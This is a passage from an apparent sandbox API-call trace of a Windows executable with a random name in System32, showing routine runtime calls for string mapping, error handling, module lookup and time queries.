¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.511] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x20e928, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.511] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x20f0fc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿC\x0f\x1aõ4ó ", lpUsedDefaultChar=0x0) returned 256 [0031.511] GetLastError () returned 0x0 [0031.511] SetLastError (dwErrCode=0x0) [0031.511] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f1fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.511] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f1fc, cbMultiByte=256, lpWideCharStr=0x20eb58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.511] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.511] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x20e948, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0031.511] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x20effc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿC\x0f\x1aõ4ó ", lpUsedDefaultChar=0x0) returned 256 [0031.525] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.525] GetLastError () returned 0x0 [0031.525] SetLastError (dwErrCode=0x0) [0031.525] GetLastError () returned 0x0 [0031.525] SetLastError (dwErrCode=0x0) [0031.525] GetLastError () returned 0x0 [0031.525] SetLastError (dwErrCode=0x0) [0031.525] GetLastError () returned 0x0 [0031.525] SetLastError (dwErrCode=0x0) [0031.525] GetLastError () returned 0x0 [0031.525] SetLastError (dwErrCode=0x0) [0031.525] GetLastError () returned 0x0 [0031.525] SetLastError (dwErrCode=0x0) [0031.525] GetLastError () returned 0x0 [0031.525] SetLastError (dwErrCode=0x0) [0031.526] GetLastError () returned 0x0 [0031.526] SetLastError (dwErrCode=0x0) [0031.526] GetLastError () returned 0x0 [0031.526] SetLastError (dwErrCode=0x0) [0031.526] GetLastError () returned 0x0 [0031.526] SetLastError (dwErrCode=0x0) [0031.526] GetLastError () returned 0x0 [0031.526] SetLastError (dwErrCode=0x0) [0031.526] GetLastError () returned 0x0 [0031.526] SetLastError (dwErrCode=0x0) [0031.526] GetLastError () returned 0x0 [0031.526] SetLastError (dwErrCode=0x0) [0031.526] GetLastError () returned 0x0 [0031.526] SetLastError (dwErrCode=0x0) [0031.526] GetLastError () returned 0x0 [0031.526] SetLastError (dwErrCode=0x0) [0031.526] GetLastError () returned 0x0 [0031.526] SetLastError (dwErrCode=0x0) [0031.526] GetLastError () returned 0x0 [0031.526] SetLastError (dwErrCode=0x0) [0031.526] GetLastError () returned 0x0 [0031.526] SetLastError (dwErrCode=0x0) [0031.527] GetLastError () returned 0x0 [0031.527] SetLastError (dwErrCode=0x0) [0031.527] GetLastError () returned 0x0 [0031.527] SetLastError (dwErrCode=0x0) [0031.527] GetLastError () returned 0x0 [0031.527] SetLastError (dwErrCode=0x0) [0031.527] GetLastError () returned 0x0 [0031.527] SetLastError (dwErrCode=0x0) [0031.527] GetLastError () returned 0x0 [0031.527] SetLastError (dwErrCode=0x0) [0031.527] GetLastError () returned 0x0 [0031.527] SetLastError (dwErrCode=0x0) [0031.527] GetLastError () returned 0x0 [0031.527] SetLastError (dwErrCode=0x0) [0031.527] GetLastError () returned 0x0 [0031.527] SetLastError (dwErrCode=0x0) [0031.528] GetLastError () returned 0x0 [0031.528] SetLastError (dwErrCode=0x0) [0031.528] GetLastError () returned 0x0 [0031.528] SetLastError (dwErrCode=0x0) [0031.528] GetLastError () returned 0x0 [0031.528] SetLastError (dwErrCode=0x0) [0031.528] GetLastError () returned 0x0 [0031.528] SetLastError (dwErrCode=0x0) [0031.528] GetLastError () returned 0x0 [0031.528] SetLastError (dwErrCode=0x0) [0031.528] GetLastError () returned 0x0 [0031.528] SetLastError (dwErrCode=0x0) [0031.528] GetLastError () returned 0x0 [0031.528] SetLastError (dwErrCode=0x0) [0031.528] GetLastError () returned 0x0 [0031.528] SetLastError (dwErrCode=0x0) [0031.528] GetLastError () returned 0x0 [0031.528] SetLastError (dwErrCode=0x0) [0031.528] GetLastError () returned 0x0 [0031.528] SetLastError (dwErrCode=0x0) [0031.528] GetLastError () returned 0x0 [0031.528] SetLastError (dwErrCode=0x0) [0031.528] GetLastError () returned 0x0 [0031.528] SetLastError (dwErrCode=0x0) [0031.528] GetLastError () returned 0x0 [0031.529] SetLastError (dwErrCode=0x0) [0031.529] GetLastError () returned 0x0 [0031.529] SetLastError (dwErrCode=0x0) [0031.529] GetLastError () returned 0x0 [0031.529] SetLastError (dwErrCode=0x0) [0031.529] GetLastError () returned 0x0 [0031.529] SetLastError (dwErrCode=0x0) [0031.529] GetLastError () returned 0x0 [0031.529] SetLastError (dwErrCode=0x0) [0031.529] GetLastError () returned 0x0 [0031.529] SetLastError (dwErrCode=0x0) [0031.529] GetLastError () returned 0x0 [0031.529] SetLastError (dwErrCode=0x0) [0031.529] GetLastError () returned 0x0 [0031.529] SetLastError (dwErrCode=0x0) [0031.529] GetLastError () returned 0x0 [0031.529] SetLastError (dwErrCode=0x0) [0031.529] GetLastError () returned 0x0 [0031.529] SetLastError (dwErrCode=0x0) [0031.529] GetLastError () returned 0x0 [0031.529] SetLastError (dwErrCode=0x0) [0031.529] GetLastError () returned 0x0 [0031.530] SetLastError (dwErrCode=0x0) [0031.530] GetLastError () returned 0x0 [0031.530] SetLastError (dwErrCode=0x0) [0031.530] GetLastError () returned 0x0 [0031.530] SetLastError (dwErrCode=0x0) [0031.530] GetLastError () returned 0x0 [0031.530] SetLastError (dwErrCode=0x0) [0031.530] GetLastError () returned 0x0 [0031.530] SetLastError (dwErrCode=0x0) [0031.530] GetLastError () returned 0x0 [0031.530] SetLastError (dwErrCode=0x0) [0031.530] GetLastError () returned 0x0 [0031.530] SetLastError (dwErrCode=0x0) [0031.530] GetLastError () returned 0x0 [0031.530] SetLastError (dwErrCode=0x0) [0031.530] GetLastError () returned 0x0 [0031.530] SetLastError (dwErrCode=0x0) [0031.530] GetLastError () returned 0x0 [0031.530] SetLastError (dwErrCode=0x0) [0031.530] GetLastError () returned 0x0 [0031.530] SetLastError (dwErrCode=0x0) [0031.530] GetLastError () returned 0x0 [0031.531] SetLastError (dwErrCode=0x0) [0031.531] GetLastError () returned 0x0 [0031.531] SetLastError (dwErrCode=0x0) [0031.531] GetLastError () returned 0x0 [0031.531] SetLastError (dwErrCode=0x0) [0031.531] GetLastError () returned 0x0 [0031.531] SetLastError (dwErrCode=0x0) [0031.531] GetLastError () returned 0x0 [0031.531] SetLastError (dwErrCode=0x0) [0031.531] GetLastError () returned 0x0 [0031.531] SetLastError (dwErrCode=0x0) [0031.531] GetLastError () returned 0x0 [0031.531] SetLastError (dwErrCode=0x0) [0031.531] GetLastError () returned 0x0 [0031.531] SetLastError (dwErrCode=0x0) [0031.531] GetLastError () returned 0x0 [0031.531] SetLastError (dwErrCode=0x0) [0031.531] GetLastError () returned 0x0 [0031.531] SetLastError (dwErrCode=0x0) [0031.531] GetLastError () returned 0x0 [0031.532] SetLastError (dwErrCode=0x0) [0031.532] GetLastError () returned 0x0 [0031.532] SetLastError (dwErrCode=0x0) [0031.532] GetLastError () returned 0x0 [0031.532] SetLastError (dwErrCode=0x0) [0031.532] GetLastError () returned 0x0 [0031.532] SetLastError (dwErrCode=0x0) [0031.532] GetLastError () returned 0x0 [0031.532] SetLastError (dwErrCode=0x0) [0031.532] GetLastError () returned 0x0 [0031.532] SetLastError (dwErrCode=0x0) [0031.532] GetLastError () returned 0x0 [0031.532] SetLastError (dwErrCode=0x0) [0031.532] GetLastError () returned 0x0 [0031.532] SetLastError (dwErrCode=0x0) [0031.532] GetLastError () returned 0x0 [0031.532] SetLastError (dwErrCode=0x0) [0031.532] GetLastError () returned 0x0 [0031.532] SetLastError (dwErrCode=0x0) [0031.532] GetLastError () returned 0x0 [0031.532] SetLastError (dwErrCode=0x0) [0031.533] GetLastError () returned 0x0 [0031.533] SetLastError (dwErrCode=0x0) [0031.533] GetLastError () returned 0x0 [0031.533] SetLastError (dwErrCode=0x0) [0031.533] GetLastError () returned 0x0 [0031.533] SetLastError (dwErrCode=0x0) [0031.533] GetLastError () returned 0x0 [0031.533] SetLastError (dwErrCode=0x0) [0031.533] GetLastError () returned 0x0 [0031.533] SetLastError (dwErrCode=0x0) [0031.533] GetLastError () returned 0x0 [0031.533] SetLastError (dwErrCode=0x0) [0031.533] GetLastError () returned 0x0 [0031.533] SetLastError (dwErrCode=0x0) [0031.533] GetLastError () returned 0x0 [0031.533] SetLastError (dwErrCode=0x0) [0031.533] GetLastError () returned 0x0 [0031.533] SetLastError (dwErrCode=0x0) [0031.533] GetLastError () returned 0x0 [0031.533] SetLastError (dwErrCode=0x0) [0031.533] GetLastError () returned 0x0 [0031.534] SetLastError (dwErrCode=0x0) [0031.534] GetLastError () returned 0x0 [0031.534] SetLastError (dwErrCode=0x0) [0031.534] GetLastError () returned 0x0 [0031.534] SetLastError (dwErrCode=0x0) [0031.534] GetLastError () returned 0x0 [0031.534] SetLastError (dwErrCode=0x0) [0031.534] GetLastError () returned 0x0 [0031.534] SetLastError (dwErrCode=0x0) [0031.534] GetLastError () returned 0x0 [0031.534] SetLastError (dwErrCode=0x0) [0031.534] GetLastError () returned 0x0 [0031.534] SetLastError (dwErrCode=0x0) [0031.534] GetLastError () returned 0x0 [0031.534] SetLastError (dwErrCode=0x0) [0031.534] GetLastError () returned 0x0 [0031.534] SetLastError (dwErrCode=0x0) [0031.534] GetLastError () returned 0x0 [0031.534] SetLastError (dwErrCode=0x0) [0031.534] GetLastError () returned 0x0 [0031.535] SetLastError (dwErrCode=0x0) [0031.535] GetLastError () returned 0x0 [0031.535] SetLastError (dwErrCode=0x0) [0031.535] GetLastError () returned 0x0 [0031.535] SetLastError (dwErrCode=0x0) [0031.535] GetLastError () returned 0x0 [0031.535] SetLastError (dwErrCode=0x0) [0031.535] GetLastError () returned 0x0 [0031.535] SetLastError (dwErrCode=0x0) [0031.535] GetLastError () returned 0x0 [0031.535] SetLastError (dwErrCode=0x0) [0031.535] GetLastError () returned 0x0 [0031.535] SetLastError (dwErrCode=0x0) [0031.535] GetLastError () returned 0x0 [0031.535] SetLastError (dwErrCode=0x0) [0031.535] GetLastError () returned 0x0 [0031.535] SetLastError (dwErrCode=0x0) [0031.535] GetLastError () returned 0x0 [0031.535] SetLastError (dwErrCode=0x0) [0031.535] GetLastError () returned 0x0 [0031.536] SetLastError (dwErrCode=0x0) [0031.536] GetLastError () returned 0x0 [0031.536] SetLastError (dwErrCode=0x0) [0031.536] GetLastError () returned 0x0 [0031.536] SetLastError (dwErrCode=0x0) [0031.536] GetLastError () returned 0x0 [0031.536] SetLastError (dwErrCode=0x0) [0031.536] GetLastError () returned 0x0 [0031.536] SetLastError (dwErrCode=0x0) [0031.536] GetLastError () returned 0x0 [0031.536] SetLastError (dwErrCode=0x0) [0031.536] GetLastError () returned 0x0 [0031.536] SetLastError (dwErrCode=0x0) [0031.536] GetLastError () returned 0x0 [0031.536] SetLastError (dwErrCode=0x0) [0031.536] GetLastError () returned 0x0 [0031.536] SetLastError (dwErrCode=0x0) [0031.536] GetLastError () returned 0x0 [0031.536] SetLastError (dwErrCode=0x0) [0031.536] GetLastError () returned 0x0 [0031.536] SetLastError (dwErrCode=0x0) [0031.536] GetLastError () returned 0x0 [0031.536] SetLastError (dwErrCode=0x0) [0031.536] GetLastError () returned 0x0 [0031.536] SetLastError (dwErrCode=0x0) [0031.536] GetLastError () returned 0x0 [0031.537] SetLastError (dwErrCode=0x0) [0031.537] GetLastError () returned 0x0 [0031.537] SetLastError (dwErrCode=0x0) [0031.537] GetLastError () returned 0x0 [0031.537] SetLastError (dwErrCode=0x0) [0031.537] GetLastError () returned 0x0 [0031.537] SetLastError (dwErrCode=0x0) [0031.537] GetLastError () returned 0x0 [0031.537] SetLastError (dwErrCode=0x0) [0031.537] GetLastError () returned 0x0 [0031.537] SetLastError (dwErrCode=0x0) [0031.537] GetLastError () returned 0x0 [0031.537] SetLastError (dwErrCode=0x0) [0031.537] GetLastError () returned 0x0 [0031.537] SetLastError (dwErrCode=0x0) [0031.537] GetLastError () returned 0x0 [0031.537] SetLastError (dwErrCode=0x0) [0031.537] GetLastError () returned 0x0 [0031.537] SetLastError (dwErrCode=0x0) [0031.537] GetLastError () returned 0x0 [0031.537] SetLastError (dwErrCode=0x0) [0031.537] GetLastError () returned 0x0 [0031.537] SetLastError (dwErrCode=0x0) [0031.537] GetLastError () returned 0x0 [0031.537] SetLastError (dwErrCode=0x0) [0031.538] GetLastError () returned 0x0 [0031.538] SetLastError (dwErrCode=0x0) [0031.538] GetLastError () returned 0x0 [0031.538] SetLastError (dwErrCode=0x0) [0031.538] GetLastError () returned 0x0 [0031.538] SetLastError (dwErrCode=0x0) [0031.538] GetLastError () returned 0x0 [0031.538] SetLastError (dwErrCode=0x0) [0031.538] GetLastError () returned 0x0 [0031.538] SetLastError (dwErrCode=0x0) [0031.538] GetLastError () returned 0x0 [0031.538] SetLastError (dwErrCode=0x0) [0031.538] GetLastError () returned 0x0 [0031.538] SetLastError (dwErrCode=0x0) [0031.538] GetLastError () returned 0x0 [0031.538] SetLastError (dwErrCode=0x0) [0031.538] GetLastError () returned 0x0 [0031.538] SetLastError (dwErrCode=0x0) [0031.538] GetLastError () returned 0x0 [0031.538] SetLastError (dwErrCode=0x0) [0031.538] GetLastError () returned 0x0 [0031.538] SetLastError (dwErrCode=0x0) [0031.538] GetLastError () returned 0x0 [0031.538] SetLastError (dwErrCode=0x0) [0031.539] GetLastError () returned 0x0 [0031.539] SetLastError (dwErrCode=0x0) [0031.539] GetLastError () returned 0x0 [0031.539] SetLastError (dwErrCode=0x0) [0031.539] GetLastError () returned 0x0 [0031.539] SetLastError (dwErrCode=0x0) [0031.539] GetLastError () returned 0x0 [0031.539] SetLastError (dwErrCode=0x0) [0031.539] GetLastError () returned 0x0 [0031.539] SetLastError (dwErrCode=0x0) [0031.539] GetLastError () returned 0x0 [0031.539] SetLastError (dwErrCode=0x0) [0031.539] GetLastError () returned 0x0 [0031.539] SetLastError (dwErrCode=0x0) [0031.539] GetLastError () returned 0x0 [0031.539] SetLastError (dwErrCode=0x0) [0031.539] GetLastError () returned 0x0 [0031.539] SetLastError (dwErrCode=0x0) [0031.539] GetLastError () returned 0x0 [0031.539] SetLastError (dwErrCode=0x0) [0031.539] GetLastError () returned 0x0 [0031.539] SetLastError (dwErrCode=0x0) [0031.539] GetLastError () returned 0x0 [0031.540] SetLastError (dwErrCode=0x0) [0031.540] GetLastError () returned 0x0 [0031.540] SetLastError (dwErrCode=0x0) [0031.540] GetLastError () returned 0x0 [0031.540] SetLastError (dwErrCode=0x0) [0031.540] GetLastError () returned 0x0 [0031.540] SetLastError (dwErrCode=0x0) [0031.540] GetLastError () returned 0x0 [0031.540] SetLastError (dwErrCode=0x0) [0031.540] GetLastError () returned 0x0 [0031.540] SetLastError (dwErrCode=0x0) [0031.540] GetLastError () returned 0x0 [0031.540] SetLastError (dwErrCode=0x0) [0031.540] GetLastError () returned 0x0 [0031.540] SetLastError (dwErrCode=0x0) [0031.540] GetLastError () returned 0x0 [0031.540] SetLastError (dwErrCode=0x0) [0031.540] GetLastError () returned 0x0 [0031.540] SetLastError (dwErrCode=0x0) [0031.540] GetLastError () returned 0x0 [0031.540] SetLastError (dwErrCode=0x0) [0031.540] GetLastError () returned 0x0 [0031.540] SetLastError (dwErrCode=0x0) [0031.540] GetLastError () returned 0x0 [0031.541] SetLastError (dwErrCode=0x0) [0031.541] GetLastError () returned 0x0 [0031.541] SetLastError (dwErrCode=0x0) [0031.541] GetLastError () returned 0x0 [0031.541] SetLastError (dwErrCode=0x0) [0031.541] GetLastError () returned 0x0 [0031.541] SetLastError (dwErrCode=0x0) [0031.541] GetLastError () returned 0x0 [0031.541] SetLastError (dwErrCode=0x0) [0031.541] GetLastError () returned 0x0 [0031.541] SetLastError (dwErrCode=0x0) [0031.541] GetLastError () returned 0x0 [0031.541] SetLastError (dwErrCode=0x0) [0031.541] GetLastError () returned 0x0 [0031.541] SetLastError (dwErrCode=0x0) [0031.541] GetLastError () returned 0x0 [0031.541] SetLastError (dwErrCode=0x0) [0031.541] GetLastError () returned 0x0 [0031.541] SetLastError (dwErrCode=0x0) [0031.541] GetLastError () returned 0x0 [0031.541] SetLastError (dwErrCode=0x0) [0031.541] GetLastError () returned 0x0 [0031.541] SetLastError (dwErrCode=0x0) [0031.541] GetLastError () returned 0x0 [0031.542] SetLastError (dwErrCode=0x0) [0031.542] GetLastError () returned 0x0 [0031.542] SetLastError (dwErrCode=0x0) [0031.542] GetLastError () returned 0x0 [0031.542] SetLastError (dwErrCode=0x0) [0031.542] GetLastError () returned 0x0 [0031.542] SetLastError (dwErrCode=0x0) [0031.542] GetLastError () returned 0x0 [0031.542] SetLastError (dwErrCode=0x0) [0031.542] GetLastError () returned 0x0 [0031.542] SetLastError (dwErrCode=0x0) [0031.542] GetLastError () returned 0x0 [0031.542] SetLastError (dwErrCode=0x0) [0031.542] GetLastError () returned 0x0 [0031.542] SetLastError (dwErrCode=0x0) [0031.542] GetLastError () returned 0x0 [0031.542] SetLastError (dwErrCode=0x0) [0031.542] GetLastError () returned 0x0 [0031.542] SetLastError (dwErrCode=0x0) [0031.542] GetLastError () returned 0x0 [0031.542] SetLastError (dwErrCode=0x0) [0031.542] GetLastError () returned 0x0 [0031.543] SetLastError (dwErrCode=0x0) [0031.543] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0031.543] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0031.543] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0031.545] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f378 | out: lpSystemTimeAsFileTime=0x20f378*(dwLowDateTime=0xe0872a30, 